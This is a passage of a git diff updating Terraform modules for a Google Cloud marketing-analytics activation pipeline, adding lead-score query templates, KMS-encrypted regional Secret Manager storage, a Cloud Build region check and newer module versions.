+  labels = {
+    version = "prod"
+  }
+
+  # The schema attribute specifies the schema of the table. In this case, the schema is defined in the JSON file.
+  schema = file("${local.source_root_dir}/sql/schema/table/${local.config_id}.json")
+
+  # The lifecycle block is used to configure the lifecycle of the table. In this case, the ignore_changes attribute is set to all, which means that Terraform will ignore
+  # any changes to the table and will not attempt to update the table.
+ lifecycle { + ignore_changes = all + } +} diff --git a/infrastructure/terraform/modules/activation/export-procedures.tf b/infrastructure/terraform/modules/activation/export-procedures.tf index 55ab1001..86d942be 100644 --- a/infrastructure/terraform/modules/activation/export-procedures.tf +++ b/infrastructure/terraform/modules/activation/export-procedures.tf @@ -118,11 +118,34 @@ resource "google_bigquery_routine" "export_churn_propensity_procedure" { routine_id = "export_churn_propensity_predictions" routine_type = "PROCEDURE" language = "SQL" - definition_body = data.template_file.purchase_propensity_csv_export_query.rendered - description = "Export purchase propensity predictions as CSV for GA4 User Data Import" + definition_body = data.template_file.churn_propensity_csv_export_query.rendered + description = "Export churn propensity predictions as CSV for GA4 User Data Import" arguments { name = "prediction_table_name" mode = "IN" data_type = jsonencode({ "typeKind" : "STRING" }) } } + +data "template_file" "lead_score_propensity_csv_export_query" { + template = file("${local.source_root_dir}/templates/activation_user_import/lead_score_propensity_csv_export.sqlx") + vars = { + ga4_stream_id = var.ga4_stream_id + export_bucket = module.pipeline_bucket.name + } +} + +resource "google_bigquery_routine" "export_lead_score_propensity_procedure" { + project = null_resource.check_bigquery_api.id != "" ? module.project_services.project_id : var.project_id + dataset_id = module.bigquery.bigquery_dataset.dataset_id + routine_id = "export_lead_score_propensity_predictions" + routine_type = "PROCEDURE" + language = "SQL" + definition_body = data.template_file.lead_score_propensity_csv_export_query.rendered + description = "Export lead score propensity predictions as CSV for GA4 User Data Import" + arguments { + name = "prediction_table_name" + mode = "IN" + data_type = jsonencode({ "typeKind" : "STRING" }) + } +} \ No newline at end of file diff --git a/infrastructure/terraform/modules/activation/main.tf b/infrastructure/terraform/modules/activation/main.tf index 1123410c..0a58a544 100644 --- a/infrastructure/terraform/modules/activation/main.tf +++ b/infrastructure/terraform/modules/activation/main.tf @@ -15,7 +15,6 @@ locals { app_prefix = "activation" source_root_dir = "../.." 
- poetry_run_alias = "${var.poetry_cmd} run" template_dir = "${local.source_root_dir}/templates" pipeline_source_dir = "${local.source_root_dir}/python/activation" trigger_function_dir = "${local.source_root_dir}/python/function" @@ -24,12 +23,15 @@ locals { auto_audience_segmentation_query_template_file = "auto_audience_segmentation_query_template.sqlx" cltv_query_template_file = "cltv_query_template.sqlx" purchase_propensity_query_template_file = "purchase_propensity_query_template.sqlx" + purchase_propensity_vbb_query_template_file = "purchase_propensity_vbb_query_template.sqlx" + lead_score_propensity_query_template_file = "lead_score_propensity_query_template.sqlx" + lead_score_propensity_vbb_query_template_file = "lead_score_propensity_vbb_query_template.sqlx" churn_propensity_query_template_file = "churn_propensity_query_template.sqlx" - measurement_protocol_payload_template_file = "app_payload_template.jinja2" activation_container_image_id = "activation-pipeline" docker_repo_prefix = "${var.location}-docker.pkg.dev/${var.project_id}" activation_container_name = "dataflow/${local.activation_container_image_id}" - source_archive_file = "activation_trigger_source.zip" + source_archive_file_prefix = "activation_trigger_source" + source_archive_file = "${local.source_archive_file_prefix}.zip" pipeline_service_account_name = "dataflow-worker" pipeline_service_account_email = "${local.app_prefix}-${local.pipeline_service_account_name}@${var.project_id}.iam.gserviceaccount.com" @@ -37,19 +39,14 @@ locals { trigger_function_account_name = "trigger-function" trigger_function_account_email = "${local.app_prefix}-${local.trigger_function_account_name}@${var.project_id}.iam.gserviceaccount.com" - builder_service_account_name = "build-job" + builder_service_account_name = "build-job" builder_service_account_email = "${local.app_prefix}-${local.builder_service_account_name}@${var.project_id}.iam.gserviceaccount.com" - activation_type_configuration_file = "${local.source_root_dir}/templates/activation_type_configuration_template.tpl" + activation_type_configuration_file = "${local.source_root_dir}/templates/activation_type_configuration_template.tpl" # This is calculating a hash number on the file content to keep track of changes and trigger redeployment of resources # in case the file content changes. activation_type_configuration_file_content_hash = filesha512(local.activation_type_configuration_file) - app_payload_template_file = "${local.source_root_dir}/templates/app_payload_template.jinja2" - # This is calculating a hash number on the file content to keep track of changes and trigger redeployment of resources - # in case the file content changes. - app_payload_template_file_content_hash = filesha512(local.activation_type_configuration_file) - activation_application_dir = "${local.source_root_dir}/python/activation" activation_application_fileset = [ "${local.activation_application_dir}/main.py", @@ -61,6 +58,20 @@ locals { # This is calculating a hash number on the files contents to keep track of changes and trigger redeployment of resources # in case any of these files contents changes. activation_application_content_hash = sha512(join("", [for f in local.activation_application_fileset : fileexists(f) ? filesha512(f) : sha512("file-not-found")])) + + ga4_setup_source_file = "${local.source_root_dir}/python/ga4_setup/setup.py" + ga4_setup_source_file_content_hash = filesha512(local.ga4_setup_source_file) + + # GCP Cloud Build is not available in all regions. 
+ cloud_build_available_locations = [ + "us-central1", + "us-west2", + "europe-west1", + "asia-east1", + "australia-southeast1", + "southamerica-east1" + ] + } data "google_project" "activation_project" { @@ -69,7 +80,7 @@ data "google_project" "activation_project" { module "project_services" { source = "terraform-google-modules/project-factory/google//modules/project_services" - version = "14.1.0" + version = "18.0.0" disable_dependent_services = false disable_services_on_destroy = false @@ -92,6 +103,7 @@ module "project_services" { "analyticsadmin.googleapis.com", "eventarc.googleapis.com", "run.googleapis.com", + "cloudkms.googleapis.com" ] } @@ -301,11 +313,47 @@ resource "null_resource" "check_cloudbuild_api" { depends_on = [ module.project_services ] + + # The lifecycle block of the google_artifact_registry_repository resource defines a precondition that + # checks if the specified region is included in the vertex_pipelines_available_locations list. + # If the condition is not met, an error message is displayed and the Terraform configuration will fail. + lifecycle { + precondition { + condition = contains(local.cloud_build_available_locations, var.location) + error_message = "Cloud Build is not available in your default region: ${var.location}.\nSet 'google_default_region' variable to a valid Cloud Build location, see Restricted Regions in https://cloud.google.com/build/docs/locations." + } + } +} + +# This resource executes gcloud commands to check whether the IAM API is enabled. +# Since enabling APIs can take a few seconds, we need to make the deployment wait until the API is enabled before resuming. +resource "null_resource" "check_cloudkms_api" { + provisioner "local-exec" { + command = <<-EOT + COUNTER=0 + MAX_TRIES=100 + while ! gcloud services list --project=${module.project_services.project_id} | grep -i "cloudkms.googleapis.com" && [ $COUNTER -lt $MAX_TRIES ] + do + sleep 6 + printf "." + COUNTER=$((COUNTER + 1)) + done + if [ $COUNTER -eq $MAX_TRIES ]; then + echo "cloud kms api is not enabled, terraform can not continue!" + exit 1 + fi + sleep 20 + EOT + } + + depends_on = [ + module.project_services + ] } module "bigquery" { source = "terraform-google-modules/bigquery/google" - version = "~> 5.4" + version = "9.0.0" dataset_id = local.app_prefix dataset_name = local.app_prefix @@ -322,10 +370,11 @@ resource "null_resource" "create_custom_events" { triggers = { services_enabled_project = null_resource.check_analyticsadmin_api.id != "" ? module.project_services.project_id : var.project_id source_contents_hash = local.activation_type_configuration_file_content_hash + source_file_content_hash = local.ga4_setup_source_file_content_hash } provisioner "local-exec" { command = <<-EOT - ${local.poetry_run_alias} ga4-setup --ga4_resource=custom_events --ga4_property_id=${var.ga4_property_id} --ga4_stream_id=${var.ga4_stream_id} + ${var.uv_run_alias} ga4-setup --ga4_resource=custom_events --ga4_property_id=${var.ga4_property_id} --ga4_stream_id=${var.ga4_stream_id} EOT working_dir = local.source_root_dir } @@ -337,12 +386,13 @@ resource "null_resource" "create_custom_events" { resource "null_resource" "create_custom_dimensions" { triggers = { services_enabled_project = null_resource.check_analyticsadmin_api.id != "" ? 
module.project_services.project_id : var.project_id + source_file_content_hash = local.ga4_setup_source_file_content_hash #source_activation_type_configuration_hash = local.activation_type_configuration_file_content_hash #source_activation_application_python_hash = local.activation_application_content_hash } provisioner "local-exec" { command = <<-EOT - ${local.poetry_run_alias} ga4-setup --ga4_resource=custom_dimensions --ga4_property_id=${var.ga4_property_id} --ga4_stream_id=${var.ga4_stream_id} + ${var.uv_run_alias} ga4-setup --ga4_resource=custom_dimensions --ga4_property_id=${var.ga4_property_id} --ga4_stream_id=${var.ga4_stream_id} EOT working_dir = local.source_root_dir } @@ -359,7 +409,7 @@ resource "google_artifact_registry_repository" "activation_repository" { module "pipeline_service_account" { source = "terraform-google-modules/service-accounts/google" - version = "~> 3.0" + version = "4.4.3" project_id = null_resource.check_dataflow_api.id != "" ? module.project_services.project_id : var.project_id prefix = local.app_prefix names = [local.pipeline_service_account_name] @@ -368,7 +418,7 @@ module "pipeline_service_account" { "${module.project_services.project_id}=>roles/dataflow.worker", "${module.project_services.project_id}=>roles/bigquery.dataEditor", "${module.project_services.project_id}=>roles/bigquery.jobUser", - "${module.project_services.project_id}=>roles/artifactregistry.writer", + "${module.project_services.project_id}=>roles/artifactregistry.writer", ] display_name = "Dataflow worker Service Account" description = "Activation Dataflow worker Service Account" @@ -376,7 +426,7 @@ module "pipeline_service_account" { module "trigger_function_account" { source = "terraform-google-modules/service-accounts/google" - version = "~> 3.0" + version = "4.4.3" project_id = null_resource.check_pubsub_api.id != "" ? module.project_services.project_id : var.project_id prefix = local.app_prefix names = [local.trigger_function_account_name] @@ -398,48 +448,139 @@ module "trigger_function_account" { # a python command defined in the module ga4_setup. # This informatoin can then be used in other parts of the Terraform configuration to access the retrieved information. data "external" "ga4_measurement_properties" { - program = ["bash", "-c", "${local.poetry_run_alias} ga4-setup --ga4_resource=measurement_properties --ga4_property_id=${var.ga4_property_id} --ga4_stream_id=${var.ga4_stream_id}"] + program = ["bash", "-c", "${var.uv_run_alias} ga4-setup --ga4_resource=measurement_properties --ga4_property_id=${var.ga4_property_id} --ga4_stream_id=${var.ga4_stream_id}"] working_dir = local.source_root_dir # The count attribute specifies how many times the external data source should be executed. # This means that the external data source will be executed only if either the # var.ga4_measurement_id or var.ga4_measurement_secret variable is not set. - count = (var.ga4_measurement_id == null || var.ga4_measurement_secret == null || var.ga4_measurement_id == "" || var.ga4_measurement_secret == "") ? 1 : 0 + count = (var.ga4_measurement_id == null || var.ga4_measurement_secret == null || var.ga4_measurement_id == "" || var.ga4_measurement_secret == "") ? 1 : 0 depends_on = [ module.project_services ] } +# It's used to create unique names for resources like KMS key rings or crypto keys, +# ensuring they don't clash with existing resources. +resource "random_id" "random_suffix" { + byte_length = 2 +} + +# This ensures that Secret Manager has a service identity within your project. 
+# This identity is crucial for securely managing secrets and allowing Secret Manager +# to interact with other Google Cloud services on your behalf. +resource "google_project_service_identity" "secretmanager_sa" { + provider = google-beta + project = null_resource.check_cloudkms_api.id != "" ? module.project_services.project_id : var.project_id + service = "secretmanager.googleapis.com" +} +# This Key Ring can then be used to store and manage encryption keys for various purposes, +# such as encrypting data at rest or protecting secrets. +resource "google_kms_key_ring" "key_ring_regional" { + name = "key_ring_regional-${random_id.random_suffix.hex}" + # If you want your replicas in other locations, change the location in the var.location variable passed as a parameter to this submodule. + # if you your replicas stored global, set the location = "global". + location = var.location + project = null_resource.check_cloudkms_api.id != "" ? module.project_services.project_id : var.project_id +} + +# This key can then be used for various encryption operations, +# such as encrypting data before storing it in Google Cloud Storage +# or protecting secrets within your application. +resource "google_kms_crypto_key" "crypto_key_regional" { + name = "crypto-key-${random_id.random_suffix.hex}" + key_ring = google_kms_key_ring.key_ring_regional.id +} + +# Defines an IAM policy that explicitly grants the Secret Manager service account +# the ability to encrypt and decrypt data using a specific CryptoKey. This is a +# common pattern for securely managing secrets, allowing Secret Manager to encrypt +# or decrypt data without requiring direct access to the underlying encryption key material. +data "google_iam_policy" "crypto_key_encrypter_decrypter" { + binding { + role = "roles/cloudkms.cryptoKeyEncrypterDecrypter" + + members = [ + "serviceAccount:${google_project_service_identity.secretmanager_sa.email}" + ] + } + + depends_on = [ + google_project_service_identity.secretmanager_sa, + google_kms_key_ring.key_ring_regional, + google_kms_crypto_key.crypto_key_regional + ] +} + +# It sets the IAM policy for a KMS CryptoKey, specifically granting permissions defined +# in another data source. +resource "google_kms_crypto_key_iam_policy" "crypto_key" { + crypto_key_id = google_kms_crypto_key.crypto_key_regional.id + policy_data = data.google_iam_policy.crypto_key_encrypter_decrypter.policy_data +} + +# It sets the IAM policy for a KMS Key Ring, granting specific permissions defined +# in a data source. +resource "google_kms_key_ring_iam_policy" "key_ring" { + key_ring_id = google_kms_key_ring.key_ring_regional.id + policy_data = data.google_iam_policy.crypto_key_encrypter_decrypter.policy_data +} + # This module stores the values ga4-measurement-id and ga4-measurement-secret in Google Cloud Secret Manager. module "secret_manager" { source = "GoogleCloudPlatform/secret-manager/google" - version = "~> 0.1" - project_id = null_resource.check_secretmanager_api.id != "" ? module.project_services.project_id : var.project_id + version = "0.7.0" + project_id = google_kms_crypto_key_iam_policy.crypto_key.etag != "" && google_kms_key_ring_iam_policy.key_ring.etag != "" ? module.project_services.project_id : var.project_id secrets = [ { name = "ga4-measurement-id" secret_data = (var.ga4_measurement_id == null || var.ga4_measurement_secret == null) ? 
data.external.ga4_measurement_properties[0].result["measurement_id"] : var.ga4_measurement_id - automatic_replication = true + automatic_replication = false }, { name = "ga4-measurement-secret" secret_data = (var.ga4_measurement_id == null || var.ga4_measurement_secret == null) ? data.external.ga4_measurement_properties[0].result["measurement_secret"] : var.ga4_measurement_secret - automatic_replication = true + automatic_replication = false }, ] + # By commenting the user_managed_replication block, you will deploy replicas that may store the secret in different locations in the globe. + # This is not a desired behaviour, make sure you're aware of it before doing it. + # By default, to respect resources location, we prevent resources from being deployed globally by deploying secrets in the same region of the compute resources. + user_managed_replication = { + ga4-measurement-id = [ + # If you want your replicas in other locations, uncomment the following lines and add them here. + # Check this example, as reference: https://github.com/GoogleCloudPlatform/terraform-google-secret-manager/blob/main/examples/multiple/main.tf#L91 + { + location = var.location + kms_key_name = google_kms_crypto_key.crypto_key_regional.id + } + ] + ga4-measurement-secret = [ + { + location = var.location + kms_key_name = google_kms_crypto_key.crypto_key_regional.id + } + ] + } + depends_on = [ - data.external.ga4_measurement_properties + data.external.ga4_measurement_properties, + google_kms_crypto_key.crypto_key_regional, + google_kms_key_ring.key_ring_regional, + google_project_service_identity.secretmanager_sa, + google_kms_crypto_key_iam_policy.crypto_key, + google_kms_key_ring_iam_policy.key_ring ] } # This module creates a Cloud Storage bucket to be used by the Activation Application module "pipeline_bucket" { - source = "terraform-google-modules/cloud-storage/google//modules/simple_bucket" - version = "~> 3.4.1" - project_id = null_resource.check_dataflow_api.id != "" ? module.project_services.project_id : var.project_id - name = "${local.app_prefix}-app-${module.project_services.project_id}" - location = var.location + source = "terraform-google-modules/cloud-storage/google//modules/simple_bucket" + version = "9.0.1" + project_id = null_resource.check_dataflow_api.id != "" ? module.project_services.project_id : var.project_id + name = "${local.app_prefix}-app-${module.project_services.project_id}" + location = var.location # When deleting a bucket, this boolean option will delete all contained objects. # If false, Terraform will fail to delete buckets which contain objects. force_destroy = true @@ -471,8 +612,8 @@ resource "google_project_iam_member" "cloud_build_job_service_account" { module.project_services, null_resource.check_artifactregistry_api, data.google_project.project, - ] - + ] + project = null_resource.check_artifactregistry_api.id != "" ? module.project_services.project_id : var.project_id member = "serviceAccount:${var.project_number}-compute@developer.gserviceaccount.com" @@ -516,16 +657,16 @@ resource "google_project_iam_member" "cloud_build_job_service_account" { } data "google_project" "project" { - project_id = null_resource.check_cloudbuild_api != "" ? module.project_services.project_id : var.project_id + project_id = null_resource.check_cloudbuild_api != "" ? 
module.project_services.project_id : var.project_id } # This module creates a Cloud Storage bucket to be used by the Cloud Build Log Bucket module "build_logs_bucket" { - source = "terraform-google-modules/cloud-storage/google//modules/simple_bucket" - version = "~> 3.4.1" - project_id = null_resource.check_cloudbuild_api != "" ? module.project_services.project_id : var.project_id - name = "${local.app_prefix}-logs-${module.project_services.project_id}" - location = var.location + source = "terraform-google-modules/cloud-storage/google//modules/simple_bucket" + version = "9.0.1" + project_id = null_resource.check_cloudbuild_api != "" ? module.project_services.project_id : var.project_id + name = "${local.app_prefix}-logs-${module.project_services.project_id}" + location = var.location # When deleting a bucket, this boolean option will delete all contained objects. # If false, Terraform will fail to delete buckets which contain objects. force_destroy = true @@ -543,8 +684,8 @@ module "build_logs_bucket" { iam_members = [ { - role = "roles/storage.admin" - member = "serviceAccount:${var.project_number}-compute@developer.gserviceaccount.com" + role = "roles/storage.admin" + member = "serviceAccount:${var.project_number}-compute@developer.gserviceaccount.com" } ] @@ -554,13 +695,6 @@ module "build_logs_bucket" { ] } -# This resource creates a bucket object using as content the measurement_protocol_payload_template_file file. -resource "google_storage_bucket_object" "measurement_protocol_payload_template_file" { - name = "${local.configuration_folder}/${local.measurement_protocol_payload_template_file}" - source = "${local.template_dir}/${local.measurement_protocol_payload_template_file}" - bucket = module.pipeline_bucket.name -} - # This resource creates a bucket object using as content the audience_segmentation_query_template_file file. data "template_file" "audience_segmentation_query_template_file" { template = file("${local.template_dir}/activation_query/${local.audience_segmentation_query_template_file}") @@ -618,7 +752,7 @@ data "template_file" "churn_propensity_query_template_file" { } } -# This resource creates a bucket object using as content the purchase_propensity_query_template_file file. +# This resource creates a bucket object using as content the churn_propensity_query_template_file file. resource "google_storage_bucket_object" "churn_propensity_query_template_file" { name = "${local.configuration_folder}/${local.churn_propensity_query_template_file}" content = data.template_file.churn_propensity_query_template_file.rendered @@ -641,6 +775,58 @@ resource "google_storage_bucket_object" "purchase_propensity_query_template_file bucket = module.pipeline_bucket.name } +# This resource creates a bucket object using as content the purchase_propensity_vbb_query_template_file file. 
+data "template_file" "purchase_propensity_vbb_query_template_file" { + template = file("${local.template_dir}/activation_query/${local.purchase_propensity_vbb_query_template_file}") + + vars = { + mds_project_id = var.mds_project_id + mds_dataset_suffix = var.mds_dataset_suffix + activation_project_id = var.project_id + dataset = module.bigquery.bigquery_dataset.dataset_id + } +} + +resource "google_storage_bucket_object" "purchase_propensity_vbb_query_template_file" { + name = "${local.configuration_folder}/${local.purchase_propensity_vbb_query_template_file}" + content = data.template_file.purchase_propensity_vbb_query_template_file.rendered + bucket = module.pipeline_bucket.name +} + +data "template_file" "lead_score_propensity_query_template_file" { + template = file("${local.template_dir}/activation_query/${local.lead_score_propensity_query_template_file}") + + vars = { + mds_project_id = var.mds_project_id + mds_dataset_suffix = var.mds_dataset_suffix + } +} + +# This resource creates a bucket object using as content the lead_score_propensity_query_template_file file. +resource "google_storage_bucket_object" "lead_score_propensity_query_template_file" { + name = "${local.configuration_folder}/${local.lead_score_propensity_query_template_file}" + content = data.template_file.lead_score_propensity_query_template_file.rendered + bucket = module.pipeline_bucket.name +} + +# This resource creates a bucket object using as content the lead_score_propensity_vbb_query_template_file file. +data "template_file" "lead_score_propensity_vbb_query_template_file" { + template = file("${local.template_dir}/activation_query/${local.lead_score_propensity_vbb_query_template_file}") + + vars = { + mds_project_id = var.mds_project_id + mds_dataset_suffix = var.mds_dataset_suffix + activation_project_id = var.project_id + dataset = module.bigquery.bigquery_dataset.dataset_id + } +} + +resource "google_storage_bucket_object" "lead_score_propensity_vbb_query_template_file" { + name = "${local.configuration_folder}/${local.lead_score_propensity_vbb_query_template_file}" + content = data.template_file.lead_score_propensity_vbb_query_template_file.rendered + bucket = module.pipeline_bucket.name +} + # This data resources creates a data resource that renders a template file and stores the rendered content in a variable. 
data "template_file" "activation_type_configuration" { template = file("${local.template_dir}/activation_type_configuration_template.tpl") @@ -650,16 +836,18 @@ data "template_file" "activation_type_configuration" { auto_audience_segmentation_query_template_gcs_path = "gs://${module.pipeline_bucket.name}/${google_storage_bucket_object.auto_audience_segmentation_query_template_file.output_name}" cltv_query_template_gcs_path = "gs://${module.pipeline_bucket.name}/${google_storage_bucket_object.cltv_query_template_file.output_name}" purchase_propensity_query_template_gcs_path = "gs://${module.pipeline_bucket.name}/${google_storage_bucket_object.purchase_propensity_query_template_file.output_name}" + purchase_propensity_vbb_query_template_gcs_path = "gs://${module.pipeline_bucket.name}/${google_storage_bucket_object.purchase_propensity_vbb_query_template_file.output_name}" churn_propensity_query_template_gcs_path = "gs://${module.pipeline_bucket.name}/${google_storage_bucket_object.churn_propensity_query_template_file.output_name}" - measurement_protocol_payload_template_gcs_path = "gs://${module.pipeline_bucket.name}/${google_storage_bucket_object.measurement_protocol_payload_template_file.output_name}" + lead_score_propensity_query_template_gcs_path = "gs://${module.pipeline_bucket.name}/${google_storage_bucket_object.lead_score_propensity_query_template_file.output_name}" + lead_score_propensity_vbb_query_template_gcs_path = "gs://${module.pipeline_bucket.name}/${google_storage_bucket_object.lead_score_propensity_vbb_query_template_file.output_name}" } } # This resource creates a bucket object using as content the activation_type_configuration.json file. resource "google_storage_bucket_object" "activation_type_configuration_file" { - name = "${local.configuration_folder}/activation_type_configuration.json" - content = data.template_file.activation_type_configuration.rendered - bucket = module.pipeline_bucket.name + name = "${local.configuration_folder}/activation_type_configuration.json" + content = data.template_file.activation_type_configuration.rendered + bucket = module.pipeline_bucket.name # Detects md5hash changes to redeploy this file to the GCS bucket. 
detect_md5hash = base64encode("${local.activation_type_configuration_file_content_hash}${local.activation_application_content_hash}") } @@ -667,12 +855,19 @@ resource "google_storage_bucket_object" "activation_type_configuration_file" { # This module submits a gcloud build to build a docker container image to be used by the Activation Application module "activation_pipeline_container" { source = "terraform-google-modules/gcloud/google" - version = "3.1.2" + version = "3.5.0" platform = "linux" - #create_cmd_body = "builds submit --project=${module.project_services.project_id} --tag ${local.docker_repo_prefix}/${google_artifact_registry_repository.activation_repository.name}/${local.activation_container_name}:latest ${local.pipeline_source_dir}" - create_cmd_body = "builds submit --project=${module.project_services.project_id} --tag ${local.docker_repo_prefix}/${google_artifact_registry_repository.activation_repository.name}/${local.activation_container_name}:latest --gcs-log-dir=gs://${module.build_logs_bucket.name} ${local.pipeline_source_dir}" + create_cmd_body = <<-EOT + builds submit \ + --project=${module.project_services.project_id} \ + --region ${var.location} \ + --default-buckets-behavior=regional-user-owned-bucket \ + --tag ${local.docker_repo_prefix}/${google_artifact_registry_repository.activation_repository.name}/${local.activation_container_name}:latest \ + --gcs-log-dir=gs://${module.build_logs_bucket.name} \ + ${local.pipeline_source_dir} + EOT destroy_cmd_body = "artifacts docker images delete --project=${module.project_services.project_id} ${local.docker_repo_prefix}/${google_artifact_registry_repository.activation_repository.name}/${local.activation_container_name} --delete-tags" create_cmd_triggers = { @@ -686,9 +881,8 @@ module "activation_pipeline_container" { # This module executes a gcloud command to build a dataflow flex template and uploads it to Dataflow module "activation_pipeline_template" { - source = "terraform-google-modules/gcloud/google" - version = "3.1.2" - additional_components = ["gsutil"] + source = "terraform-google-modules/gcloud/google" + version = "3.5.0" platform = "linux" create_cmd_body = "dataflow flex-template build --project=${module.project_services.project_id} \"gs://${module.pipeline_bucket.name}/dataflow/templates/${local.activation_container_image_id}.json\" --image \"${local.docker_repo_prefix}/${google_artifact_registry_repository.activation_repository.name}/${local.activation_container_name}:latest\" --sdk-language \"PYTHON\" --metadata-file \"${local.pipeline_source_dir}/metadata.json\"" @@ -718,11 +912,11 @@ data "archive_file" "activation_trigger_source" { # This module creates a Cloud Sorage bucket and sets the trigger_function_account_email as the admin. module "function_bucket" { - source = "terraform-google-modules/cloud-storage/google//modules/simple_bucket" - version = "~> 3.4.1" - project_id = null_resource.check_cloudfunctions_api.id != "" ? module.project_services.project_id : var.project_id - name = "${local.app_prefix}-trigger-${module.project_services.project_id}" - location = var.location + source = "terraform-google-modules/cloud-storage/google//modules/simple_bucket" + version = "9.0.1" + project_id = null_resource.check_cloudfunctions_api.id != "" ? module.project_services.project_id : var.project_id + name = "${local.app_prefix}-trigger-${module.project_services.project_id}" + location = var.location # When deleting a bucket, this boolean option will delete all contained objects. 
# If false, Terraform will fail to delete buckets which contain objects. force_destroy = true @@ -750,7 +944,7 @@ module "function_bucket" { # This resource creates a bucket object using as content the activation_trigger_archive zip file. resource "google_storage_bucket_object" "activation_trigger_archive" { - name = local.source_archive_file + name = "${local.source_archive_file_prefix}_${data.archive_file.activation_trigger_source.output_sha256}.zip" source = data.archive_file.activation_trigger_source.output_path bucket = module.function_bucket.name } @@ -821,7 +1015,7 @@ resource "google_cloudfunctions2_function" "activation_trigger_cf" { # This modules runs cloud commands that adds an invoker policy binding to a Cloud Function, allowing a specific service account to invoke the function. module "add_invoker_binding" { source = "terraform-google-modules/gcloud/google" - version = "3.1.2" + version = "3.5.0" platform = "linux" diff --git a/infrastructure/terraform/modules/activation/outputs.tf b/infrastructure/terraform/modules/activation/outputs.tf index f388db1d..da23673a 100644 --- a/infrastructure/terraform/modules/activation/outputs.tf +++ b/infrastructure/terraform/modules/activation/outputs.tf @@ -16,3 +16,8 @@ output "trigger_topic" { description = "activation trigger topic" value = google_pubsub_topic.activation_trigger.name } + +output "configuration_table_name" { + description = "smart bidding configuration table name" + value = split("/", google_bigquery_table.smart_bidding_configuration.id)[5] +} diff --git a/infrastructure/terraform/modules/activation/variables.tf b/infrastructure/terraform/modules/activation/variables.tf index d3fb4759..5814361b 100644 --- a/infrastructure/terraform/modules/activation/variables.tf +++ b/infrastructure/terraform/modules/activation/variables.tf @@ -43,8 +43,8 @@ variable "trigger_function_location" { type = string } -variable "poetry_cmd" { - description = "alias for poetry command on the current system" +variable "uv_run_alias" { + description = "alias for uv run command on the current system" type = string } @@ -72,11 +72,6 @@ variable "ga4_stream_id" { type = string } -variable "poetry_installed" { - description = "Construct to specify dependency to poetry installed" - type = string -} - variable "mds_project_id" { type = string description = "MDS Project ID" @@ -90,4 +85,4 @@ variable "mds_dataset_suffix" { variable "project_owner_email" { description = "Email address of the project owner." 
type = string -} \ No newline at end of file +} diff --git a/infrastructure/terraform/modules/activation/versions.tf b/infrastructure/terraform/modules/activation/versions.tf index 5a896e28..2e275387 100644 --- a/infrastructure/terraform/modules/activation/versions.tf +++ b/infrastructure/terraform/modules/activation/versions.tf @@ -20,7 +20,12 @@ terraform { required_providers { google = { source = "hashicorp/google" - version = ">= 3.43.0, >= 3.53.0, >= 3.63.0, >= 4.83.0, < 5.0.0, < 6.0.0" + version = "5.45.0" + } + + google-beta = { + source = "hashicorp/google-beta" + version = "5.45.0" } } diff --git a/infrastructure/terraform/modules/data-store/data-processing-services.tf b/infrastructure/terraform/modules/data-store/data-processing-services.tf index dd7e66b9..c46df258 100644 --- a/infrastructure/terraform/modules/data-store/data-processing-services.tf +++ b/infrastructure/terraform/modules/data-store/data-processing-services.tf @@ -16,7 +16,7 @@ # https://registry.terraform.io/modules/terraform-google-modules/project-factory/google/latest/submodules/project_services module "data_processing_project_services" { source = "terraform-google-modules/project-factory/google//modules/project_services" - version = "14.1.0" + version = "18.0.0" disable_dependent_services = false disable_services_on_destroy = false @@ -116,4 +116,4 @@ resource "null_resource" "check_dataform_api" { depends_on = [ module.data_processing_project_services ] -} \ No newline at end of file +} diff --git a/infrastructure/terraform/modules/data-store/dataform.tf b/infrastructure/terraform/modules/data-store/dataform.tf index 2c4d600e..24944803 100644 --- a/infrastructure/terraform/modules/data-store/dataform.tf +++ b/infrastructure/terraform/modules/data-store/dataform.tf @@ -54,9 +54,9 @@ locals { resource "google_dataform_repository" "marketing-analytics" { provider = google-beta # This is the name of the Dataform Repository created in your project - name = "marketing-analytics" - project = null_resource.check_dataform_api.id != "" ? module.data_processing_project_services.project_id : data.google_project.data_processing.project_id - region = local.dataform_derived_region + name = "marketing-analytics" + project = null_resource.check_dataform_api.id != "" ? module.data_processing_project_services.project_id : data.google_project.data_processing.project_id + region = local.dataform_derived_region lifecycle { precondition { @@ -74,4 +74,4 @@ resource "google_dataform_repository" "marketing-analytics" { depends_on = [ module.data_processing_project_services ] -} \ No newline at end of file +} diff --git a/infrastructure/terraform/modules/data-store/iam-binding.tf b/infrastructure/terraform/modules/data-store/iam-binding.tf index 4cac19f7..564efd16 100644 --- a/infrastructure/terraform/modules/data-store/iam-binding.tf +++ b/infrastructure/terraform/modules/data-store/iam-binding.tf @@ -12,18 +12,6 @@ # See the License for the specific language governing permissions and # limitations under the License. -# TODO: we might not need to have this email role at all. -resource "google_project_iam_member" "email-role" { - for_each = toset([ - "roles/iam.serviceAccountUser", // TODO: is it really needed? - "roles/dataform.admin", - "roles/dataform.editor" - ]) - role = each.key - member = "user:${var.project_owner_email}" - project = null_resource.check_dataform_api.id != "" ? 
module.data_processing_project_services.project_id : data.google_project.data_processing.project_id -} - # Check the Dataform Service Account Access Requirements for more information # https://cloud.google.com/dataform/docs/required-access locals { @@ -38,7 +26,7 @@ resource "null_resource" "wait_for_dataform_sa_creation" { MAX_TRIES=100 while ! gcloud asset search-all-iam-policies --scope=projects/${module.data_processing_project_services.project_id} --flatten="policy.bindings[].members[]" --filter="policy.bindings.members~\"serviceAccount:\"" --format="value(policy.bindings.members.split(sep=\":\").slice(1))" | grep -i "${local.dataform_sa}" && [ $COUNTER -lt $MAX_TRIES ] do - sleep 3 + sleep 10 printf "." COUNTER=$((COUNTER + 1)) done @@ -46,7 +34,7 @@ resource "null_resource" "wait_for_dataform_sa_creation" { echo "dataform service account was not created, terraform can not continue!" exit 1 fi - sleep 20 + sleep 120 EOT } @@ -56,61 +44,185 @@ resource "null_resource" "wait_for_dataform_sa_creation" { ] } +module "email-role" { + source = "terraform-google-modules/iam/google//modules/member_iam" + version = "~> 8.0" + + service_account_address = var.project_owner_email + project_id = null_resource.check_dataform_api.id != "" ? module.data_processing_project_services.project_id : data.google_project.data_processing.project_id + project_roles = [ + "roles/iam.serviceAccountUser", // TODO: is it really needed? + "roles/dataform.admin", + "roles/dataform.editor" + ] + prefix = "user" +} +#resource "google_project_iam_member" "email-role" { +# for_each = toset([ +# "roles/iam.serviceAccountUser", // TODO: is it really needed? +# "roles/dataform.admin", +# "roles/dataform.editor" +# ]) +# role = each.key +# member = "user:${var.project_owner_email}" +# project = null_resource.check_dataform_api.id != "" ? module.data_processing_project_services.project_id : data.google_project.data_processing.project_id +#} + +# 